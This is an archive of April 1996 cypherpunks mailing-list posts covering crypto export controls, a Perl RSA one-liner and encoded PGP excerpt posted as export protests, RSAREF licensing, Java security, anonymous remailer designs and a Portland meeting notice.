> be simply bluff, I have been made glad for the first time for the War on
> Drugs.  This silly war--tragic in terms of its economic cost and its
> assault on liberty--at least has forces some government agencies to take
> you seriously enough to figure out how to derail your plans of tax
> evasion.

Unfortunately, and if you stick with the list long enough and absorb the
ramifications of some of the technology, I think the government has a
losing battle.  At the moment it is estimated that 10% of tax evaders in
the United States are ever caught.

It is partly the arrogance of many U.S. citizens, and the view that their
government knows the one single way to conduct economic and foreign
affairs, that empowers the United States to impose her tax and
economic policy on unconnected sovereigns thousands of miles away.

I think you have a rather narrow view of the list in any event.
Cypherpunks are about much more than the ramifications of new technologies
on the tax systems of the world.  But, if it's sexy to demonize the list
by calling us all tax evaders, feel free.

> Michael Loomis

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sat, 27 Apr 1996 14:08:33 +0800
To: cypherpunks@toad.com
Subject: You are now an International Arms Trafficker
Message-ID: <199604262153.OAA01214@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'm guilty.... :)

http://online.offshore.com.ai/cgi-bin/munitions.pl?itar
> You are now an International Arms Trafficker
> 
> Thanks for the munitions package.
> 
> You are trafficker number: 4
> 
> Offshore Information Services Ltd.


--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 27 Apr 1996 13:36:55 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: US law - World Law - Secret Banking
In-Reply-To: <Pine.3.89.9604261141.B17571-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SUN.3.93.960426170924.6595D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Apr 1996 s1113645@tesla.cc.uottawa.ca wrote:

> 
> On Fri, 26 Apr 1996, Michael Loomis wrote:
> 
> > Holocaust fetishism.  Despite Timothy's claim to the contrary, it seems
> > that the basic point of this list is some libertarian notion that tax
> > evasion is a good thing.  While I am not clear how serious of threat, if

> It might be useful for you to browse the early portions of the archives 
> when they come back or read Tim's and Eric's original manifestos
> (somewhere in the bowels of ftp.csua.berkeley.edu/pub/cypherpunks/rants)
> and Black Unicorn's essay on his love of cash from Detweiler's page
> (can't remeber the url, I'll dig it up if you're interested, it's got
> some nice outtakes from past discussions, though Det himself is 
> rather out of it).

LD put my work on his page?  How cute.

I'll repost the work here if there is enough interest.  No telling what LD
might have done to the original.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sat, 27 Apr 1996 14:12:59 +0800
To: cypherpunks@toad.com
Subject: [Fwd: SafE Mail Encryption] got this today, anyone heard of it?
Message-ID: <31813D94.6A4A@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain

anyone heard of this? it was just sent to me.
-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)


To: thecrow@iconn.net
Subject: SafE Mail Encryption
From: safemail@ntrnet.net (Mike Wagoner (1))
Date: Fri, 26 Apr 1996 16:45:29 -0400

HI!
Please look at our web address; http://www.sfmc.com
We are information security technoligy through encyption, compresion, error
correction and we are compatible with any open network or electronic mailing
system. We use a public/private key approach. We work on Windows/DOS platform.
The gentleman, DR. Vladyslave Oleynik, who created this software moved to
The Research Triangle Park from St. Petersburg, Russia. His unique
mathematical approach gives this software the longest encryption key length
on the market today. This software also offers compression of up to 85% of
all computer generated files as well as correct statistical errors up to 30%
in a file.Because of its encryption strength, the highest compression on the
market today, its error correction capability that no one else offers, and
it is one of the easiest to use, this Russian technoligy will prove to
change the standard of software security as we know it. Our E-mail address
is safemail@nternet.net
1-800-252-9938-office       1-919-676-3810-fax

Thanks, we awaite your response!
Randy Estridge/ Mike Wagoner






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 27 Apr 1996 15:01:55 +0800
To: cypherpunks@toad.com
Subject: Re: Is the public involved in the crypto policy debate?
In-Reply-To: <ada5d55c30021004254b@[205.199.118.202]>
Message-ID: <199604262232.RAA00634@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> = Tim

> To be fair to Jim Bell, he made the same point a day or so ago.

Then I agree with him on this.  I'm not making any claims of orginality or
of depth here -- it's a simple point, probably too obvious for most people
here to concern themsevles with.  But at the same time, it's a central
point.

Big business has a lot of clout in America.  People who stand on 
soapboxes in the park (or on the net) and make impassioned speeches on 
behalf of liberty don't.

I expect the "golden key" group will get the export restrictions on crypto
killed.  That's one head of the monster, although there will be other 
heads left.

> I don't necessarily sift Stewart Baker's words for hermeneutical signs of
> what the government is planning. He might just as well have included
> "public opinion" in his list, and nothing would change.

But he didn't.  You're right, it wouldn't have altered his argument in any
significant way if he had.  But the public *was* left of his "policy
triumverate".

I don't want to read too much into it either, but he was talking about 
the differences between who is participating in the crypto discussions in 
America and in Japan -- who's included and who's excluded was central to 
what he was saying, not an afterthought he hadn't thought through.

> And I'm quite sure that Baker, Denning, Nelson, et. al. are acutely aware
> of the role of the "public" in these matters. The "public" as made manifest
> in newspaper articles critical of Clipper, in "Wired" features against key
> escrow and in favor of Cypherpunks-type themes, and so on.

My impression is that they look at the vast majority of people who rail 
against clipper as spoiled children who don't know what's good for them, 
and who must be protected from their own folly.

Of course I'm not including people like Tim in that "vast majority".  Tim
ought to be flattered by how seriously they take his ideas on crypto
anarchy.  But people like me?  I don't think we figure into the 
equation.

> While the "vocal minority" that rails against Administration policy in
> sci.crypt, talk.politics.crypto, comp.org.eff.talk, this list, etc., are
> not the public at large, we are certainly a part of the public.

The only problem I have with this statement is that it's not strong 
enough.  Public sentiment is overwhelmingly lopsided in support of our 
point of view.

But does that have an effect on policy?

> I think the rejection of Clipper by "the public" is proof of this.

What killed Clipper?  It's hard to say.  There was certainly very strong
public opposition, but I'm not sure it was worth as much in the end as
Blaze's attack.  If Clipper had worked, it would probably be alive 
today.  Blaze's attack demonstrated that even those who aren't worried 
about the government's intentions ought to worry about its competence.

And although opposistion to Clipper from business was less visible than 
the current opposition to export restrictions, it was there.  AT&T was 
roundly criticized for agreeing to work with Clipper should it have come 
to pass, but they did speak out against it (and paid Matt's salary).

I'm inclined to give more credit to Blaze and the companies who spoke
against it than to public sentiment, although I can't think of an
objective way to confirm my suspicions.

> (If we were leftist theoreticians, we could debate for years or even
> decades whether our movement is truly a mass movement, or just a vanguard
> movement, etc.)

I'm not sure those distinctions are useful, but for whatever it's worth, I
don't think debates about crypto anarchy, or fights over key management
are ever going to be joined by the public at large.  It takes a lot of 
work to understand the issues, and most people have their hands full with 
the things that are going on in their own lives and careers.

Clipper was easy to grab ahold of -- big brother wants to put a
wiretapping chip in your phone, what do you think of that?  I don't know
that the rest of the points we'll fight over will be as accessible.  The 
devil's in the details, and the details are hard to slog through.

(I wasn't able to get any of my friends excited when Netscape let users 
choose which CAs to trust in 2.0b3, for example.)

All I'm really saying is that having business on our side of the export 
issue is a good thing, and it could very well be the difference between 
victory and defeat, despite the fact that some of the companies in 
question might have questionable credentials as civil libertarians.

The text Hal quoted gave some small reinforcement of that point of view,
in my opinion.  I wouldn't argue that it's enough to prove that big
businesses have a disproportionate amount of political clout -- that's
probably another job best left to the leftist theoreticians.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 27 Apr 1996 16:32:02 +0800
To: perry@piermont.com
Subject: Re: Golden Key Campaign
In-Reply-To: <199604270019.UAA01587@jekyll.piermont.com>
Message-ID: <199604270039.RAA09438@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	What do you mean by "per se"? 

	That it might be covered by the Stanford patents? (Those are
the ones that allegedly cover all public-key, right?)


> 
> David Mazieres writes:
> > Isn't Rabin's algorithm patented, too?
> 
> There is no patent on Rabin per se.
> 
> .pm
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 27 Apr 1996 17:07:15 +0800
To: perry@piermont.com
Subject: Re: The Joy of Java
In-Reply-To: <199604270025.UAA01602@jekyll.piermont.com>
Message-ID: <199604270040.RAA09526@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I go further. Java, as envisioned, cannot be made secure. It is too
> powerful a language. Furthermore, it is unnecessary for the tasks that
> it is used for, which are basically adding fancy wacky graphics and
> simple applications and such to web pages.
> 

	Even though that is all it is used for now, I think it was
*intended* to be used for more.


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sat, 27 Apr 1996 14:04:20 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: RSAREF dos not give you access to RSA
In-Reply-To: <199604250814.BAA07715@toad.com>
Message-ID: <199604262148.RAA27065@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: Bill Stewart <stewarts@ix.netcom.com>
> Date: Thu, 25 Apr 1996 01:11:13 -0700
>
> 5) the price of RSA is fairly low, once free RSAREF came out

RSAREF does not give you RSA.  Do not think that you can write and
distribute free software that uses RSA encryption in the US just
because of the existence of RSAREF.  If you don't believe me, let me
tell you a little story.

The RSAREF license strictly requires that you only use the documented
RSAREF interface, which does not include direct access to the RSA
functions.  The relevant portion of the RSAREF license is section 2d:

          Prior permission from RSA in writing is required for any
          modifications that access the Program through ways other
          than the published Program interface or for modifications to
          the Program interface. (See the "What is it? RSAREF Supports
          the Following Algorithms" and "What You Can (and Cannot) Do
          With RSAREF," paragraph 4, all incorporated herein by
          reference, for details.) RSA will grant all reasonable
          requests for permission to make such modifications.

PGP got a such "prior permission" to call functions outside of the
RSAREF interface.  However, that is only because PGP was such a
high-profile case with a lot of MIT people behind it.

On July 10, 1995, Tatu Ylonen sent mail to RSA attempting to get
permission for US users to use RSAREF with ssh.  Since ssh requires
double encryption, something impossible to achieve through the
published RSAREF interface, it called two of the functions PGP also
uses, namely RSAPublicEncrypt and RSAPrivateDecrypt.

It took RSA until September to respond to the original request, at
which point they told Tatu they could only consider such a request
coming from a US citizen.  On Monday, September 11, 1995, I therefore
sent in my own request to be able to use ssh with RSAREF.

After many many messages, I got bounced around from RSA to Consensys
Corp. and back to RSA.  I was never able to get permission to use ssh
with RSAREF.  For a while I was a bit optimistic about the situation.
For example on February 16, 1996, I was told the permission letter
"should be sent out next week."  However, it's been a couple of months
since then and still no letter.

Even if I get the letter tomorrow, however, it still will have been 9
months since the first request to RSA went in.  The RSA folks seemed
particularly concerned that the permission letter might be used for
more than one particular program, or even more than one particular
version of a ssh if major changes occured.  In one letter, for
instance, someone from RSA said:

   We'd like to avoid granting open-ended permission like: SSH
   provides for all of your security needs and the RSA calls are used
   to provide any kind of security service deemed useful now and in
   the future.  Not that we wouldn't grant permission to new
   function/feature requests, rather we'd like to incentivize you to
   keep us posted as ssh grows.

That means if I got a permission letter tomorrow, but in several
months ssh was modified to use a better MAC, I might have to wait
another 9 months to use the latest version ssh (which might no longer
be the latest version by that point).

Even if you think 9 months is an acceptible amount of time to wait to
release an application you have written, consider this:  First of all,
I don't have the permission letter yet.  I might get it tomorrow, I
might get it in a year, or I might not get it before the RSA patent
expires.  Second of all, the only reason I have gotten as far as I did
with this permission letter is because someone from MIT helped get me
in touch with someone at RSAREF who would actually read my mail.
Before that, I was told by RSA that I could only deal with Consensys
Corp., and Consensys Corp. told me they could not grant me the kind of
permission letter I was requesting, so that I was basically stuck
(well, in theory Jonathan Zamick from Consensys Corp. could still be
working on getting permission from RSA, but I haven't heard back from
him since Nov 9, [except when he wanted to license IDEA to me, which
ssh fortunately already has permission to use]).

Conclusion:  You can't use the RSA algorithm in free software.  The
RSAREF interface is too restrictive, and when RSA says in the license
that "RSA will grant all reasonable requests for permission to make
such modifications" to the interface, it is either an outright lie, or
something that only happens after so much delay that they might as
well not give you such permission.

David

P.S.  You can help fight software patents!  Join the league for
programming freedom (http://www.lpf.org).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sat, 27 Apr 1996 13:56:39 +0800
To: gerhard@pyrod.ovsod.co.za
Subject: Re: PGP + Pegasus Mail
In-Reply-To: <m0uCmvi-0006wbC@pyrod.ovsod.co.za>
Message-ID: <9604262202.AA6443@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Bart" == "G Ackerman" <gerhard@[192.96.77.1]> writes:

  > Hi, I want to know if it is possible - and how to use PGP from
  > within Pmail.

Yes, for WinPmail 2.23 and above.

Check out the Pegasus Mail home page: 
	http://www.cuslm.ca/pegasus/

John Navas' PGP Open Encryptor Interface home page:
	http://web.aimnet.com/~jnavas/

and the PMail mailing list (warning -- high volume):
	mail "subscribe pmail My Name" To: listserv@ua1vm.ua.edu

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Apr 1996 16:55:15 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <199604270100.SAA11735@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:57 PM 4/26/96 -0700, Timothy C. May wrote:
>I think the interesting target date to plan for is a year from now.

I said a few months ago that I thought Java would be ready for prime time
in a couple of years.  I think we are in complete agreement here.


>>(1) There are not many sources of high-quality entropy available to Java
>>applets.  Keystroke timings and scribble windows are probably the best
>>sources, but may represent an inconvenience for users.
>
>Shouldn't be any worse or any better than with the status quo, right? I'm
>not sure I see the Java issue. (I've been looking at SoundClip and
>AudioClip, but only cursorily.)

I think it is a bit worse since an applet doesn't get access to a lot of
stuff a C program, or even better an OS gets.  A C program has a lot of
environmental queries that might produce some entropy, although they would
also be available to an attacker on the same system.  The OS has access to
interrupt times, mouse movements, and keyboard timings for ALL the
applications that have run since boot.


>By the way, Hal Finney is working on a bignum package.

I know.  I have an (old) version on my disk.  AFAIK, Hal is the most active
person developing crypto and crypto related Java code.  He deserves thanks
from all of us.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sat, 27 Apr 1996 14:03:35 +0800
To: perry@piermont.com
Subject: Re: Golden Key Campaign
In-Reply-To: <199604251810.LAA17469@netcom9.netcom.com>
Message-ID: <199604262210.SAA27467@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199604251927.PAA27960@jekyll.piermont.com> "Perry E. Metzger" <perry@piermont.com> writes:

> From: "Perry E. Metzger" <perry@piermont.com>
> cc: Bill Stewart <stewarts@ix.netcom.com>, cypherpunks@toad.com
> Date: Thu, 25 Apr 1996 15:27:04 -0400
> Reply-To: perry@piermont.com
> X-From-Line: cypherpunks-errors@toad.com  Thu Apr 25 20:07:52 1996
> X-Authentication-Warning: jekyll.piermont.com: Host perry@localhost didn't use HELO protocol
> X-Reposting-Policy: redistribute only with permission
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Lines: 11
> Xref: amsterdam.lcs.mit.edu cypherpunks:8797
> 
> 
> Bill Frantz writes:
> > I will add to Bill's list:
> > 
> > 7) RSA is the best known and vetted of the Public Key algorithms.
> 
> Nota at all, Mr. Frantz. There are no proofs of security associated
> with RSA. Rabin has excellent proofs that breaking a message is
> strictly equivalent to factoring.

Isn't Rabin's algorithm patented, too?  Perhaps the licensing terms
are better.  Does anyone know for sure?

Thanks,
David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 27 Apr 1996 14:24:27 +0800
To: cypherpunks@toad.com
Subject: Re: Click here to become an International Arms Trafficker
Message-ID: <2.2.32.19960426091033.00688010@gateway>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 PM 04/26/96 -0400, Vince Cate wrote:
>
>   "Click here to become an International Arms Trafficker"
>
>Offshore Information Services Ltd. has set up a web page to make it really
>easy for people to become International Arms Traffickers.  All they have to
>do is fill in their name and email address and then click.  Check out:
>
>   http://online.offshore.com.ai/arms-trafficker/
>
>If you think this is half as funny as I do, please make a link from
>one of your pages to this one.
>

Well, I'm ITAR violator # 6 :-)

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 27 Apr 1996 14:03:21 +0800
To: dcsb@ai.mit.edu
Subject: What Wired proposes, NetlyNews Disposes ;-).
Message-ID: <v03006602ada6f998c81a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I just sent a third (from scratch) iteration of the OpEd article Wired
wanted this afternoon. Meanwhile, I sold the first (from scratch) iteration
to NetlyNews, viz,

http://www.netlynews.com/

I believe I'm having fun now...

No. I'm *not* an economist. I don't even play one on the net...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 27 Apr 1996 15:53:48 +0800
To: perry@piermont.com
Subject: Re: WWW proxies?
In-Reply-To: <199604270050.UAA01645@jekyll.piermont.com>
Message-ID: <199604270128.SAA12508@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The CERN HTTP server is a proxy out of the box.

	CERN HTTP has a few problems:
A) It is slow
B) It requires client-software cooperation
C) Doesn't allow chaining
D) Doesn't do crypto.

	C2 will be soon announcing an anon proxy which eliminates both
problems B and C. Eliminating problem D will be done in the near term,
and eliminating problem A will be done in the long term.

	(BTW: We are in search of a gfx designer for this
project. Please contact me if you know someone)

> 
> > Will we have as extensive a WWW proxy network as remailer network?
> 
> Unclear.
> 
> .pm
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Sat, 27 Apr 1996 15:33:02 +0800
To: cypherpunks@toad.com
Subject: Re: An idea for refining penet-style anonymous servers
In-Reply-To: <Uc5fx8m9LojB085yn@netcom.com>
Message-ID: <4lrtrv$dq@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <Uc5fx8m9LojB085yn@netcom.com>,
Alan Bostick <abostick@netcom.com> wrote:
>                                          Authorities cannot use a search
> for one identity as an excuse for a fishing expedition in the address
> database.   [...]
> There is a way that attackers who have seized or copied the database can
> search it - by trying it out on anonymous IDs, or user addresses, until
> they hit paydirt.

So maybe this is an incremental improvement over the penet model,
but I'm not yet convinced that it's really a gigantic advance.

The threat model I'm most worried about is this: I post a Co$
document about clams & volcanos, under a nym.  The Co$ has enough
lawyers to subvert any justice system; they might be pissed off
enough to target me.  I don't want them to recover my name.

As you point out, your improvement can't protect against this scenario.

Maybe it can help protect others, so that when the Co$ scum steal
the database, they can't compromise everyone who's ever used penet.
But I'm not convinced-- what if the Co$ do a DejaNews search for
'anon*@penet.fi' and use each hit to query the database?  I think
they'll be able to break the anonymity of nearly everyone in the
database.


So I'll make another proposal, to try to be constructive.

Write a program to translate between penet-style remailers and
mixmaster/alpha style remailers.  Set up a service which automatically
creates a chain of nyms for you, with encryption at all the
mixmaster/alpha - to - mixmaster/alpha links.

People seem to (like / be familiar with / be willing to use) the
penet style interface-- so use the penet syntax as the interface
to the user, so the user doesn't have to know anything about what
the remailers are doing behind his back.  (Or use some *simple*
Java/html-forms/... interface.)

Advantages: to figure out the link between a nym and the real person,
you have to compromise a whole chain of remailers (except for the
following drawback).  the nym<->person database is distributed,
so is less susceptible to attack.

Drawbacks: this doesn't encrypt the link between the user and the
first remailer, so if Co$ can sniff on the link between you and
your first remailer, you're screwed.  This is still an improvement
over vanilla penet.fi-- the Co$ has better lawyers than wiretappers,
I suspect-- and you can also make sure your first link is just a
couple of hops away.  One might also contemplate using Hal's java
applet to automatically pgp encrypt the first link (so you only
have to assume that the web server you got the applet from is
trustworthy, and that the Co$ isn't doing active attacks on you).

This is still a compromise between security & usability, unfortunately.

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 27 Apr 1996 14:54:05 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: WWW proxies?
Message-ID: <Pine.SUN.3.93.960426191223.12146D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone developed such a beast yet?

Will we have as extensive a WWW proxy network as remailer network?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 27 Apr 1996 15:47:46 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
In-Reply-To: <ada697c601021004c3a0@[205.199.118.202]>
Message-ID: <199604270221.TAA17097@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:

 > The complete specification of the Java Virtual Machine means
 > that the behavior of Java programs is perfectly
 > well-defined, and one does not have to tweek anything which
 > is processor or operating system dependent.

Scott Brickner <sjb@universe.digex.net> writes:

 > Unfortunately, this last statement isn't really true.  To
 > quote from the "Java Security" paper from some Princeton
 > researchers:

 >      The Java language has neighter a formal semantics nor
 >      a formal description of its type system.  We do not
 >      know what a Java program means, in any formal sense, so
 >      we cannot reason formally about Java and the security
 >      properties of the Java libraries written in Java. Java
 >      lacks a formal description of its type system, yet the
 >      security of Java relies on the soundness of its type
 >      system.

This is overly pessimistic.  Java primitive data types are fully
specified and Java operators are well-defined in the sense that
their results are unambiguous with specified input.  One
certainly does not have situations as one has in C, where things
like "int" or what happens to the sign bit on certain shifts is
left up to the implementor's discretion.  Even the typical "side
effects" tricks with passed parameters should be impossible with
Java programs.

While it is true that formal meta-language descriptions of Java
semantics and the universe of Java types are not currently
provided for the language, and the traditional kinds of formal
correctness proofs haven't been published, the language is
sufficiently simple and restricted to make it unlikely that major
loopholes will be discovered in this area.  I would be truly
surprised, for instance, if instruction sequences which
unbalanced the stack, wrote out of bounds, or accessed memory
locations as inconsistant types, were discovered to slip past a
bytecode verifier correctly implemented according to Sun's
recommendations.

Saying that the current specification does not support formal
proofs of correctness is far different than saying that the
language itself is broken.

 >      The Java bytecode is where the security properties
 >      must ultimately be verified . . . .  Unfortunately, it
 >      is rather difficult to verify the bytecode. . . .  The
 >      present type verifier cannot be proven correct, because
 >      there is not a formal description of the type system.

Again, he is not saying that the type verifier isn't correct,
merely that the materials with which to construct a proof have
not yet been dumped on top of his desk.

 >      Object-oriented type systems are a current research
 >      topic; it seems unwise for the system's security to
 >      rely on such a mechanism without a strong theoretical
 >      foundation.  It is not certain that an informally
 >      specified system as large and complicated as Java
 >      bytecode is consistent.

Not certain, but very very likely.  Due to the restricted nature
of Java and the bytecode, the checks that need to be done are
fairly simple transitive closures of relations involving local
program structure.  While the general theory of object-oriented
runtime structures can get hairy, Java's elimination of things
like multiple inheritance makes its own corner of this universe
considerably more tractable.

 >      We conclude that the Java system in its current form
 >      cannot easily be made secure.  Significant redesign of
 >      the language, the bytecode format, and the runtime
 >      system appear to be necessary steps toward building a
 >      higher-assurance system. . . . Execution of remotely-
 >      loaded code is a relatively new phenomenon, and more
 >      work is required to make it safe.

This summary might be a bit more impressive if the author had
included a bytecode fragment or two as a concrete example of
where such changes were necessitated.

 > I do think that the ideas embodied in Java are very
 > important, and will significantly shape the future of
 > computing, but Java itself may be just a stepping stone on
 > the way.

I think Java, as currently specified, is going to be around for
quite a while.  I further think that the concerns expressed above
will be addressed by augmentation of the existing specifications
and by construction of the necessary proofs of correctness, and
not by drastic surgery on the language and virtual machine as
they currently exist.

In any case, the anarchy of the free market rarely takes notice
of the theoretical musings of academicians.  Until Java
experiences a catastrophic and public train wreck, people will
continue to use it and its reputation will continue to grow.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 27 Apr 1996 17:18:47 +0800
To: pdx-cypherpunks-l@teleport.com
Subject: Reminder: PDX Physical Cypherpunks Meeting Saturday
Message-ID: <2.2.32.19960427023120.00a27cf8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


A reminder for those who are intending to show up....

If you are intending on being involved with the key signing, please send me
your public key(s) so that they can be included.


-----BEGIN PGP SIGNED MESSAGE-----

There will be another physical meeting on the Cypherpunks in Portland, OR.

The particulars:

Location:   Powell's Technical Bookstore
            33 NW Park
            Portland, OR 97209
            (Just north of Burnside off of the Park blocks.)

Date:       April 27th, 1996
Time:       5:23pm

Discussions will cover:

** A Portland Remailer

** Various Coding Projects

** Events in the News

** Other Projects related to Crypto (Web sites and Documentation)

** Possible PGP Keysigning (Depends on the response)

** General Discussion Devolving into Chaos

If you have any other topics for discussion, bring them up at the meeting or 
you can e-mail me in advance.

Powell's Technical Book has a good selection of crypto books, so you might 
want to be prepared.  (Do not bring money you cannot afford to spend.  
Powell's has an evil force that seduces people into buying books.)

A PGP keysigning will be held if there are enough interested people.  If you 
are interested in participating, please send me your public key via e-mail.

Any comments, suggestions, ideas, and/or complains can be sent to me at 
alano@teleport.com.
 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMXMZZeQCP3v30CeZAQG0/Af/To2q0fuLk8Q6KquP+6LX1/1EOqGGoxBZ
jWfCJoz40Wk1EHMJMis+XpiPgcXg2nAZNeQXubS4Q9se8uGG57UbzpX8rv5GnzdV
HWimufNeL/bfxSn+OYswTEQExSwG2V/TSWZNwfFf5Xl/6V0zy1Xa5qY8CEtXn1fr
3/vXicYexd3NwSvToN5udYYtUe2kH14O3RIoXAnaJwMZLvS+oiDzw8LWXI7UMdsf
akUbhisfgf/lu3wiMVQkN2hdP15rioIlAhryA0skvl1fxh3OkFC8/GDJpRBRWD+K
RjO5VgRRXYrQUG4PKAK8Y1/PSINzandOkaMc2duaSshslZYyI3YRmg==
=zD1a
-----END PGP SIGNATURE-----
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
